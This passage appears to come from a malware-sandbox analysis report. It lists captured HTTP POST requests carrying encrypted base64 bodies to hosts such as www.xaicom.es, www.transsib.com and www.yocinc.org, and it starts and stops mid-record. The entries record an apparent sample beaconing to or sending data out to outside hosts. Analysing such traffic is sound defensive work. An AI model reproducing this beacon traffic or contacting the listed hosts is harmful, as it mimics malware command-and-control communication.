6a 66 49 6c 39 6f 4d 48 2f 55 73 53 58 6a 46 75 51 4d 48 76 66 56 46 67 63 41 77 61 6b 38 32 65 73 4f 2b 48 79 71 67 44 4e 77 36 46 6a 51 36 6c 76 6a 46 75 33 72 67 50 69 46 62 55 34 45 7a 72 79 51 68 47 4a 75 37 35 54 46 34 3d Data Ascii: W/BXVhKsM8ZFljVTxdxfsRU7M/NiubqRZqMEhXRoHeKuQpuyEHwqlH1x8D42dJGf/V4YjG0On8g4086m5T1Gudng60sAxLmEUuVHxpSGNF17VJtvxkVKuP8v4PLwDrmDk5sZg4M4D+VTlNdnfTGV+ReCszNpecyI78zu5t6jQvuDVSlxXRetY51wiOvHji9k6W8dj6/3ua798KWnSHLmG1PY2crxmmT8aY2CpIqaFQXyKAdZbP567ZVc7gUZldE2kB6kCAqCQDWo/DhqpIJo3KzLZ/VBhrM3jCmufkmtVtDyeaw0ch4fVMTTYmhvtjrqhWkW7Ndsm2QXribEZbCvJSZ3ONqNToX50QnwsCDwlLSfqGsX5rikXWA7a1Lej2GesbhfhVIuf0vldV6zoghD8e/ee/vQfGXPuifI+gxGuEGP0IwfF9/E9zCIo8IS5wxlk47pgj/1EFV5vUg4N1vNHsQSEE8cJ0Yv453vCBTHKdHkMJBznO35ihgoFjKAwLnJjA1IjfIl9oMH/UsSXjFuQMHvfVFgcAwak82esO+HyqgDNw6FjQ6lvjFu3rgPiFbU4EzryQhGJu75TF4=
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 584User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.xaicom.esCache-Control: no-cacheData Raw: 6d 38 6f 6e 56 39 4b 79 4d 38 61 49 68 57 36 52 68 62 54 51 58 4e 57 76 70 4b 38 69 56 38 4b 2b 4a 72 37 66 65 7a 45 35 4b 2b 38 55 2b 6e 57 38 77 76 66 44 41 64 6e 4b 68 66 6d 2f 2b 31 34 32 71 39 4f 57 2b 42 35 61 68 45 61 72 4e 61 4b 66 38 2f 34 74 43 42 38 67 51 42 49 4e 6b 53 32 58 61 71 46 56 73 50 45 42 75 72 53 4c 33 54 6d 6d 31 35 53 33 30 33 51 31 47 2b 6a 2f 63 66 4e 62 6b 63 4e 2b 4b 58 78 55 4f 6a 6a 37 56 6e 57 32 55 6c 71 72 6b 6a 71 51 6f 54 71 6d 34 73 31 59 78 46 42 6b 2b 30 2f 38 30 43 44 4c 56 34 4f 37 65 52 74 42 46 72 65 44 35 4a 33 39 6c 76 43 77 67 5a 76 4a 70 62 4a 4f 76 79 61 49 51 7a 76 68 6a 39 4d 74 4c 6f 32 42 4c 44 52 4e 6c 42 57 68 35 43 62 41 2b 75 54 76 34 36 46 77 38 68 75 43 64 55 45 66 56 46 74 36 64 65 51 4e 5a 4c 72 57 49 79 7a 64 70 52 57 44 7a 59 34 6d 38 59 4f 50 58 35 4e 7a 5a 4b 64 38 4a 65 52 47 51 48 34 72 69 34 2b 69 42 73 70 56 51 48 36 68 73 48 51 51 4d 59 79 2b 59 43 33 35 58 65 51 4a 70 4e 37 51 49 71 46 71 54 6f 4d 45 6d 6d 78 31 51 6a 30 2b 36 4e 65 4a 73 45 37 74 4a 68 7a 36 47 6a 67 51 43 6f 7a 6a 6d 33 45 66 39 4e 68 6f 63 64 42 49 76 63 37 4e 73 73 4d 51 46 2b 7a 51 4c 46 37 69 42 38 55 2f 61 77 50 72 2b 55 6f 74 31 64 68 34 5a 4c 52 31 31 48 67 6f 31 57 79 6f 56 75 55 38 55 69 4a 57 72 47 53 77 4b 4b 71 37 63 6c 61 4b 72 6d 71 7a 6a 62 54 33 4a 6c 4c 74 31 59 48 45 30 51 64 7a 38 58 39 74 72 4c 4c 2b 32 44 68 46 55 4b 59 55 53 67 38 2b 41 75 63 43 76 33 2b 49 2b 62 61 53 6d 61 58 35 71 4c 4a 4a 74 53 68 38 50 52 74 36 46 55 76 65 39 51 48 31 6b 4c 72 42 78 4e 50 4e 44 58 76 51 49 77 7a 4e 36 53 59 72 64 42 34 41 34 67 39 45 66 59 2f 5a 38 6f 4c 69 53 2b 6d 45 45 58 76 2b 46 73 45 53 6a 6b 35 48 42 54 5a 62 52 46 58 78 51 39 34 32 64 33 53 6c 62 59 58 54 6c 71 6b 3d Data Ascii: m8onV9KyM8aIhW6RhbTQXNWvpK8iV8K+Jr7fezE5K+8U+nW8wvfDAdnKhfm/+142q9OW+B5ahEarNaKf8/4tCB8gQBINkS2XaqFVsPEBurSL3Tmm15S303Q1G+j/cfNbkcN+KXxUOjj7VnW2UlqrkjqQoTqm4s1YxFBk+0/80CDLV4O7eRtBFreD5J39lvCwgZvJpbJOvyaIQzvhj9MtLo2BLDRNlBWh5CbA+uTv46Fw8huCdUEfVFt6deQNZLrWIyzdpRWDzY4m8YOPX5NzZKd8JeRGQH4ri4+iBspVQH6hsHQQMYy+YC35XeQJpN7QIqFqToMEmmx1Qj0+6NeJsE7tJhz6GjgQCozjm3Ef9NhocdBIvc7NssMQF+zQLF7iB8U/awPr+Uot1dh4ZLR11Hgo1WyoVuU8UiJWrGSwKKq7claKrmqzjbT3JlLt1YHE0Qdz8X9trLL+2DhFUKYUSg8+AucCv3+I+baSmaX5qLJJtSh8PRt6FUve9QH1kLrBxNPNDXvQIwzN6SYrdB4A4g9EfY/Z8oLiS+mEEXv+FsESjk5HBTZbRFXxQ942d3SlbYXTlqk=
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 596User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.transsib.comCache-Control: no-cacheData Raw: 50 71 55 39 31 75 45 79 4a 38 5a 38 79 2b 56 76 51 43 36 72 34 72 71 5a 73 59 58 66 4e 63 50 2f 70 59 39 76 4f 37 55 6c 38 58 45 4e 41 48 48 75 44 50 6c 45 4e 77 47 69 63 71 6a 45 2b 6b 49 37 53 35 56 65 70 6c 2f 6d 44 33 4f 55 32 63 4a 32 6c 79 76 41 6e 6a 5a 6a 38 58 30 6d 6b 6a 65 5a 4f 6b 38 46 51 51 44 49 61 2f 36 56 59 4c 30 61 6d 6d 52 71 46 54 6f 4e 56 48 5a 59 45 57 48 63 6b 62 77 46 72 72 6e 49 52 76 6d 5a 67 48 31 52 67 77 55 47 73 4b 41 38 5a 59 53 71 7a 73 78 45 70 37 77 66 39 38 50 2b 64 72 6b 35 59 77 61 53 56 6a 58 45 56 65 2b 63 59 4a 51 78 56 41 6b 55 7a 35 75 56 30 51 48 70 47 55 44 70 71 77 2b 49 73 55 48 31 49 45 75 47 6d 2b 62 32 68 74 33 2b 51 6a 5a 4e 75 38 51 32 30 69 72 78 65 59 76 4e 49 56 44 64 50 62 4a 51 4c 75 52 31 72 49 65 69 77 63 36 64 61 56 46 72 42 63 36 73 79 49 72 72 50 73 77 50 68 32 49 35 4b 69 56 39 4d 7a 6b 62 30 59 2b 48 36 49 56 53 35 6a 33 47 35 70 45 57 6b 72 35 72 6c 75 44 33 61 66 51 46 75 73 30 43 43 45 34 55 44 7a 4c 54 6a 4c 39 51 31 2b 4c 38 55 64 30 2b 54 38 59 72 49 32 30 39 69 50 2f 61 37 43 47 39 54 4b 5a 35 4b 6a 50 65 42 4b 35 5a 31 48 6d 36 70 4f 70 34 4d 54 77 74 54 5a 71 6d 31 48 46 70 6e 5a 7a 4f 43 4c 46 6b 4c 51 42 44 31 59 6b 67 4d 56 59 59 53 48 52 73 41 42 4f 4e 56 30 4e 73 72 32 61 71 78 77 37 67 62 73 55 37 44 6d 41 4c 44 4c 63 71 47 6c 62 51 74 61 71 70 32 62 73 54 59 76 67 69 42 43 57 50 32 78 46 70 41 42 47 59 69 39 52 37 7a 6a 54 62 70 32 43 79 68 79 37 4d 66 45 58 58 68 45 2f 76 2f 79 56 62 72 4a 33 6b 55 2f 47 62 6a 7a 44 42 76 76 44 2f 76 47 43 51 54 72 75 6d 37 54 76 65 5a 61 67 70 5a 77 6f 4a 76 53 6e 42 58 68 31 73 70 4d 57 67 78 4a 45 71 48 43 45 59 48 4b 38 53 70 6a 39 43 2b 75 67 4c 34 4b 77 44 4e 54 72 4f 35 32 75 76 64 79 2f 50 52 57 65 70 76 74 69 31 45 56 6b 4b 67 65 44 2b Data Ascii: PqU91uEyJ8Z8y+VvQC6r4rqZsYXfNcP/pY9vO7Ul8XENAHHuDPlENwGicqjE+kI7S5Vepl/mD3OU2cJ2lyvAnjZj8X0mkjeZOk8FQQDIa/6VYL0ammRqFToNVHZYEWHckbwFrrnIRvmZgH1RgwUGsKA8ZYSqzsxEp7wf98P+drk5YwaSVjXEVe+cYJQxVAkUz5uV0QHpGUDpqw+IsUH1IEuGm+b2ht3+QjZNu8Q20irxeYvNIVDdPbJQLuR1rIeiwc6daVFrBc6syIrrPswPh2I5KiV9Mzkb0Y+H6IVS5j3G5pEWkr5rluD3afQFus0CCE4UDzLTjL9Q1+L8Ud0+T8YrI209iP/a7CG9TKZ5KjPeBK5Z1Hm6pOp4MTwtTZqm1HFpnZzOCLFkLQBD1YkgMVYYSHRsABONV0Nsr2aqxw7gbsU7DmALDLcqGlbQtaqp2bsTYvgiBCWP2xFpABGYi9R7zjTbp2Cyhy7MfEXXhE/v/yVbrJ3kU/GbjzDBvvD/vGCQTrum7TveZagpZwoJvSnBXh1spMWgxJEqHCEYHK8Spj9C+ugL4KwDNTrO52uvdy/PRWepvti1EVkKgeD+
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 548User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.abart.plCache-Control: no-cacheData Raw: 32 79 36 6e 76 35 45 58 4e 38 62 52 55 58 71 51 4d 4f 76 48 6a 65 72 52 33 68 78 50 4d 43 49 75 56 53 66 36 34 70 58 66 35 51 4b 4a 61 64 59 2b 49 39 49 6a 77 34 6a 46 72 50 47 69 7a 75 6c 64 56 79 54 55 49 72 31 67 64 42 46 69 4d 58 79 49 51 39 66 66 5a 79 42 78 7a 35 39 6d 2b 4c 7a 63 49 77 67 2b 7a 35 69 51 34 44 71 48 56 52 43 70 49 64 56 78 69 63 76 30 7a 51 53 74 52 41 56 49 6d 63 4e 39 61 30 76 44 62 43 47 65 4e 43 73 45 4c 38 54 36 64 71 4f 4a 56 57 39 74 4e 73 52 46 6a 47 46 77 31 6d 37 57 36 32 5a 37 71 78 53 57 38 73 33 45 37 33 43 38 58 59 79 65 52 39 72 2f 52 36 4a 37 35 4a 64 33 69 42 4c 78 6e 59 4a 70 77 67 69 4e 34 61 65 30 78 46 6c 6d 4e 30 72 67 6f 43 35 4a 58 52 52 67 64 6f 55 34 55 30 52 79 68 39 67 37 4a 32 43 30 51 51 41 73 51 35 2f 64 76 34 34 76 56 56 34 75 45 2f 64 53 48 66 43 47 53 38 34 37 50 52 54 4c 6b 55 32 45 6e 71 61 54 61 6a 44 6f 6d 31 37 78 72 6e 68 42 6a 63 64 4c 39 78 7a 4e 59 4c 4e 38 73 49 69 30 79 4b 49 76 34 48 46 59 64 58 36 34 74 62 64 58 67 4d 64 2b 6f 7a 62 52 61 38 45 4f 37 4e 6a 6e 66 43 76 63 69 54 50 2f 32 48 66 45 30 77 30 43 49 59 62 73 63 53 69 34 57 79 62 69 39 67 6b 42 69 61 51 35 57 75 6c 66 61 61 6c 38 61 73 38 39 44 45 57 30 32 71 68 7a 63 63 79 30 38 65 30 65 39 50 6d 49 50 34 6d 30 2b 51 73 74 36 72 6c 41 6b 76 6f 57 66 45 6f 63 67 4e 35 53 77 59 74 45 59 35 54 6f 2f 58 34 76 52 4b 36 4a 38 77 32 55 6b 79 77 65 32 48 62 4e 63 41 46 33 32 6c 54 65 52 66 62 42 6a 4f 66 7a 50 2b 56 75 72 63 53 67 4a 62 59 59 42 66 4a 6a 32 61 7a 37 45 6d 36 42 66 61 55 67 62 78 33 65 72 39 47 30 56 4a 38 33 56 47 4d 6f 34 72 4d 77 67 37 75 68 66 59 66 50 59 4a 55 30 63 67 3d 3d Data Ascii: 2y6nv5EXN8bRUXqQMOvHjerR3hxPMCIuVSf64pXf5QKJadY+I9Ijw4jFrPGizuldVyTUIr1gdBFiMXyIQ9ffZyBxz59m+LzcIwg+z5iQ4DqHVRCpIdVxicv0zQStRAVImcN9a0vDbCGeNCsEL8T6dqOJVW9tNsRFjGFw1m7W62Z7qxSW8s3E73C8XYyeR9r/R6J75Jd3iBLxnYJpwgiN4ae0xFlmN0rgoC5JXRRgdoU4U0Ryh9g7J2C0QQAsQ5/dv44vVV4uE/dSHfCGS847PRTLkU2EnqaTajDom17xrnhBjcdL9xzNYLN8sIi0yKIv4HFYdX64tbdXgMd+ozbRa8EO7NjnfCvciTP/2HfE0w0CIYbscSi4Wybi9gkBiaQ5Wulfaal8as89DEW02qhzccy08e0e9PmIP4m0+Qst6rlAkvoWfEocgN5SwYtEY5To/X4vRK6J8w2Ukywe2HbNcAF32lTeRfbBjOfzP+VurcSgJbYYBfJj2az7Em6BfaUgbx3er9G0VJ83VGMo4rMwg7uhfYfPYJU0cg==
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 584User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.xaicom.esCache-Control: no-cacheData Raw: 6d 38 6f 6e 56 39 4b 79 4d 38 61 49 68 57 36 52 68 62 54 51 58 4e 57 76 70 4b 38 69 56 38 4b 2b 4a 72 37 66 65 7a 45 35 4b 2b 38 55 2b 6e 57 38 77 76 66 44 41 64 6e 4b 68 66 6d 2f 2b 31 34 32 71 39 4f 57 2b 42 35 61 68 45 61 72 4e 61 4b 66 38 2f 34 74 43 42 38 67 51 42 49 4e 6b 53 32 58 61 71 46 56 73 50 45 42 75 72 53 4c 33 54 6d 6d 31 35 53 33 30 33 51 31 47 2b 6a 2f 63 66 4e 62 6b 63 4e 2b 4b 58 78 55 4f 6a 6a 37 56 6e 57 32 55 6c 71 72 6b 6a 71 51 6f 54 71 6d 34 73 31 59 78 46 42 6b 2b 30 2f 38 30 43 44 4c 56 34 4f 37 65 52 74 42 46 72 65 44 35 4a 33 39 6c 76 43 77 67 5a 76 4a 70 62 4a 4f 76 79 61 49 51 7a 76 68 6a 39 4d 74 4c 6f 32 42 4c 44 52 4e 6c 42 57 68 35 43 62 41 2b 75 54 76 34 36 46 77 38 68 75 43 64 55 45 66 56 46 74 36 64 65 51 4e 5a 4c 72 57 49 79 7a 64 70 52 57 44 7a 59 34 6d 38 59 4f 50 58 35 4e 7a 5a 4b 64 38 4a 65 52 47 51 48 34 72 69 34 2b 69 42 73 70 56 51 48 36 68 73 48 51 51 4d 59 79 2b 59 43 33 35 58 65 51 4a 70 4e 37 51 49 71 46 71 54 6f 4d 45 6d 6d 78 31 51 6a 30 2b 36 4e 65 4a 73 45 37 74 4a 68 7a 36 47 6a 67 51 43 6f 7a 6a 6d 33 45 66 39 4e 68 6f 63 64 42 49 76 63 37 4e 73 73 4d 51 46 2b 7a 51 4c 46 37 69 42 38 55 2f 61 77 50 72 2b 55 6f 74 31 64 68 34 5a 4c 52 31 31 48 67 6f 31 57 79 6f 56 75 55 38 55 69 4a 57 72 47 53 77 4b 4b 71 37 63 6c 61 4b 72 6d 71 7a 6a 62 54 33 4a 6c 4c 74 31 59 48 45 30 51 64 7a 38 58 39 74 72 4c 4c 2b 32 44 68 46 55 4b 59 55 53 67 38 2b 41 75 63 43 76 33 2b 49 2b 62 61 53 6d 61 58 35 71 4c 4a 4a 74 53 68 38 50 52 74 36 46 55 76 65 39 51 48 31 6b 4c 72 42 78 4e 50 4e 44 58 76 51 49 77 7a 4e 36 53 59 72 64 42 34 41 34 67 39 45 66 59 2f 5a 38 6f 4c 69 53 2b 6d 45 45 58 76 2b 46 73 45 53 6a 6b 35 48 42 54 5a 62 52 46 58 78 51 39 34 32 64 33 53 6c 62 59 58 54 6c 71 6b 3d Data Ascii: m8onV9KyM8aIhW6RhbTQXNWvpK8iV8K+Jr7fezE5K+8U+nW8wvfDAdnKhfm/+142q9OW+B5ahEarNaKf8/4tCB8gQBINkS2XaqFVsPEBurSL3Tmm15S303Q1G+j/cfNbkcN+KXxUOjj7VnW2UlqrkjqQoTqm4s1YxFBk+0/80CDLV4O7eRtBFreD5J39lvCwgZvJpbJOvyaIQzvhj9MtLo2BLDRNlBWh5CbA+uTv46Fw8huCdUEfVFt6deQNZLrWIyzdpRWDzY4m8YOPX5NzZKd8JeRGQH4ri4+iBspVQH6hsHQQMYy+YC35XeQJpN7QIqFqToMEmmx1Qj0+6NeJsE7tJhz6GjgQCozjm3Ef9NhocdBIvc7NssMQF+zQLF7iB8U/awPr+Uot1dh4ZLR11Hgo1WyoVuU8UiJWrGSwKKq7claKrmqzjbT3JlLt1YHE0Qdz8X9trLL+2DhFUKYUSg8+AucCv3+I+baSmaX5qLJJtSh8PRt6FUve9QH1kLrBxNPNDXvQIwzN6SYrdB4A4g9EfY/Z8oLiS+mEEXv+FsESjk5HBTZbRFXxQ942d3SlbYXTlqk=
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 548User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.synetik.netCache-Control: no-cacheData Raw: 69 48 4f 71 73 44 6a 72 50 73 62 37 2b 58 6b 75 75 7a 58 52 56 79 75 54 6f 54 2b 41 5a 70 51 45 37 4c 46 55 34 4b 63 37 41 45 4d 71 44 37 44 42 6b 49 6a 39 61 37 79 49 70 36 4d 58 77 4d 56 4d 44 2b 71 74 6f 2f 42 55 79 6f 6c 55 4f 6f 74 72 44 66 51 37 4b 33 71 62 79 2f 33 4d 76 66 67 41 66 62 6f 62 42 34 2b 42 75 6b 39 53 7a 62 70 59 52 63 4c 2f 4f 76 31 4b 32 7a 4f 68 6c 57 66 47 2f 51 51 4d 4c 4c 32 4f 72 4f 6e 42 46 57 47 4c 57 36 31 43 67 6c 6d 43 30 56 57 77 32 7a 34 49 46 57 7a 65 78 6f 4d 55 71 6b 33 35 6e 74 5a 33 6b 74 33 70 68 4c 31 44 4a 69 46 39 68 72 67 62 73 57 6a 65 30 6f 63 77 33 6d 71 2b 33 67 45 71 59 74 73 47 38 36 67 65 52 4b 56 32 4b 72 6e 4f 78 66 51 38 61 73 6c 6b 7a 6e 32 34 52 38 78 56 56 48 55 6f 30 4b 41 6c 6a 77 70 4a 59 6b 4b 67 2f 76 63 76 30 36 65 4a 68 75 58 37 66 49 32 54 50 59 44 79 54 78 6e 76 2b 55 53 47 36 4c 7a 64 70 66 4d 4b 35 50 6c 76 56 46 74 4f 31 71 4e 76 6b 66 63 42 57 39 4b 39 74 46 2b 37 51 59 50 67 48 41 37 67 32 76 48 4e 6b 39 63 72 52 73 61 6b 36 67 4c 4b 6b 64 58 54 51 79 76 4f 56 57 73 63 59 57 7a 4c 78 73 68 36 42 58 4d 54 35 59 69 42 36 75 33 33 56 32 52 32 2b 62 37 48 51 78 63 71 69 37 67 76 54 7a 72 42 31 70 47 6c 41 32 33 77 70 42 4a 6d 64 2b 58 71 54 76 43 55 6f 76 54 33 79 54 46 73 67 77 6c 4b 6d 63 52 68 36 6d 47 5a 51 6c 6a 58 2f 45 74 4e 76 77 64 41 54 72 47 6a 7a 4d 49 2f 35 38 35 4e 63 39 36 37 4e 7a 30 6e 73 35 76 32 6c 6f 58 2b 41 78 62 75 4b 51 52 66 57 6f 56 4f 44 67 63 6c 59 61 46 34 77 2f 74 58 58 50 74 65 69 32 45 75 4a 48 34 6c 63 37 63 63 72 61 44 52 6c 6d 6d 41 33 50 43 6c 52 67 58 42 52 43 72 66 59 78 78 49 6d 70 73 4a 76 64 6b 4d 36 42 73 3d Data Ascii: iHOqsDjrPsb7+XkuuzXRVyuToT+AZpQE7LFU4Kc7AEMqD7DBkIj9a7yIp6MXwMVMD+qto/BUyolUOotrDfQ7K3qby/3MvfgAfbobB4+Buk9SzbpYRcL/Ov1K2zOhlWfG/QQMLL2OrOnBFWGLW61CglmC0VWw2z4IFWzexoMUqk35ntZ3kt3phL1DJiF9hrgbsWje0ocw3mq+3gEqYtsG86geRKV2KrnOxfQ8aslkzn24R8xVVHUo0KAljwpJYkKg/vcv06eJhuX7fI2TPYDyTxnv+USG6LzdpfMK5PlvVFtO1qNvkfcBW9K9tF+7QYPgHA7g2vHNk9crRsak6gLKkdXTQyvOVWscYWzLxsh6BXMT5YiB6u33V2R2+b7HQxcqi7gvTzrB1pGlA23wpBJmd+XqTvCUovT3yTFsgwlKmcRh6mGZQljX/EtNvwdATrGjzMI/585Nc967Nz0ns5v2loX+AxbuKQRfWoVODgclYaF4w/tXXPtei2EuJH4lc7ccraDRlmmA3PClRgXBRCrfYxxImpsJvdkM6Bs=
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 552User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.mqs.com.brCache-Control: no-cacheData Raw: 6c 6e 77 31 78 35 2b 6d 50 38 5a 7a 49 72 32 37 2f 73 4f 55 37 79 68 4f 2f 73 4a 31 54 37 4c 6c 51 34 69 48 76 44 4b 6c 71 66 30 41 4d 37 41 49 39 77 5a 44 4a 41 45 71 4a 65 6f 32 43 42 45 38 53 54 30 4f 2f 43 63 2b 51 46 77 75 66 33 4b 31 70 6f 79 2f 34 63 37 65 30 31 58 53 70 69 77 43 2f 53 52 77 61 4c 31 6c 68 74 68 61 50 74 4e 61 68 2b 74 31 57 6e 6f 53 6b 63 46 42 4b 63 58 38 59 45 79 79 38 49 65 63 6c 4f 58 32 50 50 51 6b 75 76 69 4d 69 2f 57 31 46 79 4b 5a 48 43 50 64 31 39 63 69 57 53 66 72 42 57 2b 69 37 6a 68 75 47 42 4a 68 5a 66 54 74 37 75 66 69 6f 5a 35 6f 4e 49 58 32 63 33 78 36 6c 39 6d 63 5a 6d 63 2f 6e 62 44 39 34 56 6c 37 44 38 31 75 77 4a 54 74 4e 45 36 54 46 37 30 38 76 4d 51 61 53 6d 6b 43 66 52 6f 47 42 38 6f 75 48 58 44 70 66 74 47 67 6a 44 6c 63 79 6b 6d 6f 76 4b 67 36 77 4d 30 6b 5a 53 31 64 2b 39 51 4f 62 6e 75 38 71 50 6e 32 4d 39 49 2b 4b 4f 58 4f 76 4e 45 49 41 4a 55 65 53 50 4c 66 49 73 66 39 4f 57 36 57 62 33 42 56 4b 74 57 6a 36 45 46 44 4b 42 68 7a 4d 57 72 69 7a 43 69 50 42 49 30 73 64 30 57 36 34 47 4e 4f 6f 67 6c 75 46 68 71 2f 54 6f 68 44 6f 4d 74 65 6b 36 4f 4f 31 5a 4e 6a 75 77 55 6b 36 59 68 39 66 5a 34 63 49 76 74 75 4a 4f 2b 64 45 50 6f 38 68 41 57 32 43 35 33 31 75 46 73 5a 38 68 30 44 4d 71 63 6c 45 34 75 34 45 4c 66 6b 31 71 74 31 4e 71 7a 34 56 44 71 67 79 35 68 37 50 64 59 2b 56 64 4b 77 31 41 4e 51 66 50 33 73 78 70 2f 64 64 48 58 68 54 49 75 64 51 36 44 55 2b 38 69 53 7a 4d 4e 58 65 45 62 4f 78 59 67 38 51 47 7a 6f 6f 59 44 74 6a 4d 42 2f 39 42 76 42 70 67 44 66 53 72 47 30 4e 58 43 4b 78 68 5a 72 69 77 77 39 31 74 59 31 67 6d 65 4b 77 4a 68 64 51 67 4d 65 35 31 6e 59 65 45 73 3d Data Ascii: lnw1x5+mP8ZzIr27/sOU7yhO/sJ1T7LlQ4iHvDKlqf0AM7AI9wZDJAEqJeo2CBE8ST0O/Cc+QFwuf3K1poy/4c7e01XSpiwC/SRwaL1lhthaPtNah+t1WnoSkcFBKcX8YEyy8IeclOX2PPQkuviMi/W1FyKZHCPd19ciWSfrBW+i7jhuGBJhZfTt7ufioZ5oNIX2c3x6l9mcZmc/nbD94Vl7D81uwJTtNE6TF708vMQaSmkCfRoGB8ouHXDpftGgjDlcykmovKg6wM0kZS1d+9QObnu8qPn2M9I+KOXOvNEIAJUeSPLfIsf9OW6Wb3BVKtWj6EFDKBhzMWrizCiPBI0sd0W64GNOogluFhq/TohDoMtek6OO1ZNjuwUk6Yh9fZ4cIvtuJO+dEPo8hAW2C531uFsZ8h0DMqclE4u4ELfk1qt1Nqz4VDqgy5h7PdY+VdKw1ANQfP3sxp/ddHXhTIudQ6DU+8iSzMNXeEbOxYg8QGzooYDtjMB/9BvBpgDfSrG0NXCKxhZriww91tY1gmeKwJhdQgMe51nYeEs=
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 548User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.aevga.comCache-Control: no-cacheData Raw: 7a 6d 44 6f 72 63 4a 30 54 38 5a 48 31 7a 41 61 74 53 33 76 58 55 58 33 4b 62 6a 53 46 2b 31 42 46 69 63 48 73 71 6f 4f 62 63 2f 33 72 57 32 4b 72 50 56 79 43 61 4b 52 4c 7a 31 68 47 67 59 6f 6b 6d 63 77 68 41 6c 76 44 6e 68 68 62 6f 2b 66 39 67 5a 52 6e 68 6e 42 6d 50 42 32 70 5a 7a 6f 4c 41 6e 31 4c 30 4f 78 72 65 5a 58 6a 55 59 61 37 46 4c 38 4f 66 54 64 2f 76 56 6d 61 4a 58 37 30 31 31 54 77 61 63 47 72 66 7a 47 52 48 46 37 4c 63 70 49 4c 6c 47 57 6f 31 30 61 53 35 64 6e 7a 77 53 67 45 75 74 6c 31 61 53 6d 66 34 44 62 67 48 54 6a 70 6f 79 37 79 41 44 72 45 64 66 76 56 6e 41 39 68 38 6e 65 39 37 4a 7a 6c 6c 32 56 53 6a 56 67 36 73 7a 33 73 6f 47 58 54 69 4a 47 48 6d 46 78 34 6a 48 4e 53 48 77 71 63 34 6d 30 65 4b 72 46 33 55 66 44 59 34 37 32 46 41 6c 68 6b 6d 76 42 42 46 51 53 6b 78 63 59 39 55 52 75 7a 64 70 71 4c 62 71 72 37 42 6f 50 45 63 43 6e 79 70 6a 30 37 67 51 65 54 2f 79 2b 68 62 48 5a 46 79 4e 57 6c 6e 7a 4b 44 54 36 39 39 31 43 67 71 6b 56 6d 67 45 4d 41 37 59 55 56 44 6d 49 43 65 46 33 4a 5a 56 6a 6c 45 53 58 75 65 6c 50 76 7a 4b 30 44 43 5a 4e 76 75 57 49 6d 4f 43 30 49 6e 4f 59 79 69 31 47 78 77 46 62 51 6e 4b 6e 4c 74 5a 77 65 7a 70 73 4f 76 4a 33 6d 71 47 2f 59 66 52 52 4a 48 77 2b 6b 4a 54 6c 50 4a 4c 51 50 47 56 46 61 65 77 6c 49 6e 74 32 48 59 7a 6c 34 36 4a 41 79 37 4c 64 78 33 36 66 76 6a 31 59 68 6f 6e 52 4a 39 58 56 68 58 49 68 6d 56 36 77 39 45 4b 43 30 34 39 50 43 38 30 67 63 69 38 47 52 4e 69 68 35 43 67 4b 6e 52 44 37 42 49 78 78 2b 2b 42 4a 4c 34 51 6d 57 72 48 74 4b 75 7a 6f 30 38 76 4a 2f 70 75 54 41 54 66 36 58 5a 37 5a 32 31 4f 74 50 30 4d 5a 71 59 59 54 59 4a 6d 5a 4d 57 4d 55 41 Data Ascii: zmDorcJ0T8ZH1zAatS3vXUX3KbjSF+1BFicHsqoObc/3rW2KrPVyCaKRLz1hGgYokmcwhAlvDnhhbo+f9gZRnhnBmPB2pZzoLAn1L0OxreZXjUYa7FL8OfTd/vVmaJX7011TwacGrfzGRHF7LcpILlGWo10aS5dnzwSgEutl1aSmf4DbgHTjpoy7yADrEdfvVnA9h8ne97Jzll2VSjVg6sz3soGXTiJGHmFx4jHNSHwqc4m0eKrF3UfDY472FAlhkmvBBFQSkxcY9URuzdpqLbqr7BoPEcCnypj07gQeT/y+hbHZFyNWlnzKDT6991CgqkVmgEMA7YUVDmICeF3JZVjlESXuelPvzK0DCZNvuWImOC0InOYyi1GxwFbQnKnLtZwezpsOvJ3mqG/YfRRJHw+kJTlPJLQPGVFaewlInt2HYzl46JAy7Ldx36fvj1YhonRJ9XVhXIhmV6w9EKC049PC80gci8GRNih5CgKnRD7BIxx++BJL4QmWrHtKuzo08vJ/puTATf6XZ7Z21OtP0MZqYYTYJmZMWMUA
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 600User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.yocinc.orgCache-Control: no-cacheData Raw: 4f 34 72 68 35 6d 68 4f 55 63 61 6c 45 79 7a 66 4b 31 37 31 57 39 74 4a 36 75 6c 77 77 64 66 66 48 44 44 75 45 79 47 57 50 61 51 73 41 6d 47 52 7a 56 30 62 67 66 57 74 4d 38 39 53 74 68 57 6d 37 4d 41 79 64 6d 55 64 63 78 4e 47 6c 47 69 36 37 55 73 37 4d 36 65 55 56 39 74 72 33 30 4b 36 56 37 78 6a 61 6b 4f 2f 35 36 6c 4d 73 34 47 54 39 63 73 34 47 48 31 2f 68 6c 2f 30 78 35 4d 49 71 65 4a 53 77 54 6d 36 44 6b 31 6c 61 62 53 62 38 6c 31 66 4a 33 34 52 46 54 76 35 4e 53 70 42 79 38 71 63 70 73 32 49 66 38 61 43 49 7a 67 44 36 6f 48 6c 4f 2b 72 55 